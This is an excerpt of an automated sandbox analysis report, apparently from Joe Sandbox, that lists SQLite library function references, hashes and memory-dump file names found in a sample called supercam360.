                                                    • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 2673540737-0
                                                    • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                    • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                    • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                    • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                    • String ID:
                                                    • API String ID: 3526213481-0
                                                    • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                    • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                    • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                    • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                    APIs
                                                    • sqlite3_vmprintf.SQLITE3 ref: 609298DC
                                                      • Part of subcall function 60929643: sqlite3_initialize.SQLITE3 ref: 6092964D
                                                    • sqlite3_mprintf.SQLITE3 ref: 609298FC
                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                    • sqlite3_free.SQLITE3 ref: 60929907
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_free.SQLITE3 ref: 60929922
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 2126213637-0
                                                    • Opcode ID: 9cd505cc25204affe1a8d25f1b99f2f22cb65db7dde897ba5d76927de8a4b480
                                                    • Instruction ID: 13efba25bfc7911c5b295ff1541eb6c31128a22c7405fe94ccab49b9f850283e
                                                    • Opcode Fuzzy Hash: 9cd505cc25204affe1a8d25f1b99f2f22cb65db7dde897ba5d76927de8a4b480
                                                    • Instruction Fuzzy Hash: E5012CB4A143069FDB109F69D48164ABBF9FF68768F10442DE8D8C7304E774D980CB52
                                                    APIs
                                                      • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                    • sqlite3_log.SQLITE3 ref: 609258E5
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 609258FF
                                                    • sqlite3_value_text.SQLITE3 ref: 60925918
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925932
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 645246966-0
                                                    • Opcode ID: 003c7d729514850cd2670d5ff0a501923a7c05c01e7ee08f7af9080d29ed2bfd
                                                    • Instruction ID: 8b3d20099653fcf7515df79f2a12a915b58be957357f5192ef5f37aead3f1b7c
                                                    • Opcode Fuzzy Hash: 003c7d729514850cd2670d5ff0a501923a7c05c01e7ee08f7af9080d29ed2bfd
                                                    • Instruction Fuzzy Hash: A3015274A18344CBDB149F69E4C13097BE6EF65358F049869EC898F309E774D8C0CB41
                                                    APIs
                                                    • sqlite3_prepare.SQLITE3 ref: 60969166
                                                    • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                      • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                    • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                      • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                    • sqlite3_step.SQLITE3 ref: 60969197
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                    • String ID:
                                                    • API String ID: 2877408194-0
                                                    • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                    • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                    • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                    • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                    • String ID:
                                                    • API String ID: 1163609955-0
                                                    • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                    • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                    • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                    • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                    APIs
                                                    • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                    • sqlite3_step.SQLITE3 ref: 609615C9
                                                    • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                      • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                    • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                    • String ID:
                                                    • API String ID: 4265739436-0
                                                    • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                    • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                    • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                    • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                    • strcmp.MSVCRT ref: 6092A66A
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                    • String ID:
                                                    • API String ID: 1894734062-0
                                                    • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                    • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                    • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                    • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1477753154-0
                                                    • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                    • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                    • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                    • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 609408BE
                                                    • sqlite3_blob_close.SQLITE3 ref: 609408C9
                                                      • Part of subcall function 60940849: sqlite3_mutex_enter.SQLITE3 ref: 60940864
                                                      • Part of subcall function 60940849: sqlite3_finalize.SQLITE3 ref: 6094086F
                                                      • Part of subcall function 60940849: sqlite3_mutex_leave.SQLITE3 ref: 60940885
                                                    • sqlite3_free.SQLITE3 ref: 609408AD
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_free.SQLITE3 ref: 609408D1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_enter$sqlite3_blob_closesqlite3_finalizesqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 3376080156-0
                                                    • Opcode ID: 62bba8bded67edb3e7ec5b4190a567f2186f1725189168df9a038347470dbc26
                                                    • Instruction ID: d915195a03e04bddfc3f3f5b3271b7f2e0ed873b55f11ac5d14163ef78522696
                                                    • Opcode Fuzzy Hash: 62bba8bded67edb3e7ec5b4190a567f2186f1725189168df9a038347470dbc26
                                                    • Instruction Fuzzy Hash: F5E039B09087008FDB10AF79C5C57057BE9AB74318F4618ACE8C28B346E735D8C0CB92
                                                    APIs
                                                    • sqlite3_randomness.SQLITE3 ref: 6093E9A3
                                                    • sqlite3_randomness.SQLITE3 ref: 6093EAC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_randomness
                                                    • String ID:
                                                    • API String ID: 2799796375-3916222277
                                                    • Opcode ID: 229229ae701aea0a2e5856c37940d2b5861fd8a773e90e62e8eee996633a259a
                                                    • Instruction ID: 3887470c8237d86ac67bd2190f6f3690fc73287e72b0d230b9f4df168a81262f
                                                    • Opcode Fuzzy Hash: 229229ae701aea0a2e5856c37940d2b5861fd8a773e90e62e8eee996633a259a
                                                    • Instruction Fuzzy Hash: 8712D674A046288BDB24CF69C88079DBBF6BF98314F20856DD499A7391EB34ED85CF41
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: into$out of
                                                    • API String ID: 632333372-1114767565
                                                    • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                    • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                    • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                    • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                    APIs
                                                      • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                    • sqlite3_free.SQLITE3 ref: 609193A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_value_text
                                                    • String ID: (NULL)$NULL
                                                    • API String ID: 2175239460-873412390
                                                    • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                    • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                    • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                    • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: string or blob too big$|
                                                    • API String ID: 632333372-330586046
                                                    • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                    • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                    • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                    • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: d$|
                                                    • API String ID: 632333372-415524447
                                                    • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                    • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                    • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                    • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: -- $d
                                                    • API String ID: 632333372-777087308
                                                    • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                    • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                    • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                    • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_value_text
                                                    • String ID: string or blob too big
                                                    • API String ID: 2320820228-2803948771
                                                    • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                    • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                    • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                    • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
